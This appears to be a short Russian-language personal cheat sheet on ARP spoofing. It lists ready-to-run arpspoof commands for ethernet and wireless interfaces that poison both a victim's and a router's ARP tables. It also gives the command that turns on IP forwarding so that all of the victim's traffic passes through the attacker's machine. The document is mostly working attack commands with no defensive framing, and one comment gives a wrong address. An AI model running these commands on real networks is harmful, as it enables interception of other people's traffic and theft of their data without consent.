ARP SPOOFING # Атака с изменением арп таблицы жертвы и роутера 

АТАКА осуществляется путем отправления двух arp ответов

	- один роутеру

	- второй жертве 

РЕЗУЛЬТАТ - все пакеты будут проходить через мое устройство


####
	arp -a # просмотреть текущие значения arp таблицы  Linux/Windows


--------------------------
ВСТРОЕННАЯ УТИЛИТА kali linux arpspoof

	- arpspoof -i name interface -t [ip-adress host] [ip-address gateway]

#### ETHERNET 

arpspoof -i enp2s0 -t 192.168.100.2 192.168.100.1 # ethernet interface
	# я роутер 192.168.100.1 сообщаю жертве -> 192.168.100.2

arpspoof -i enp2s0 -t 192.168.100.1 192.168.100.2 # ethernet interface
	# я жертва 192.168.100.2 сообщаю роутеру -> 192.168.100.2


#### WIRELESS

arpspoof -i wlp3s0 -t 192.168.100.2 192.168.100.1 # wireless interface
	# я роутер 192.168.100.1 сообщаю жертве -> 192.168.100.2

arpspoof -i wlp3s0 -t 192.168.100.1 192.168.100.2 # wireless interface


#### ВАЖНО АТАКУЮЩИЙ КОМПЬЮТЕР НЕ ЯВЛЯЕТСЯ РОУТЕРОМ
	ПРИ ПОЛУЧЕНИИ запросов компьютер их сбрасывает и они не доходят до шлюза



---------------------------
---- PORT FORWARDING # позволяет перенаправлять пакеты с текущего устройства


	- echo 1 > /proc/sys/net/ipv4/ip_forward # выполнить от суперпользователя




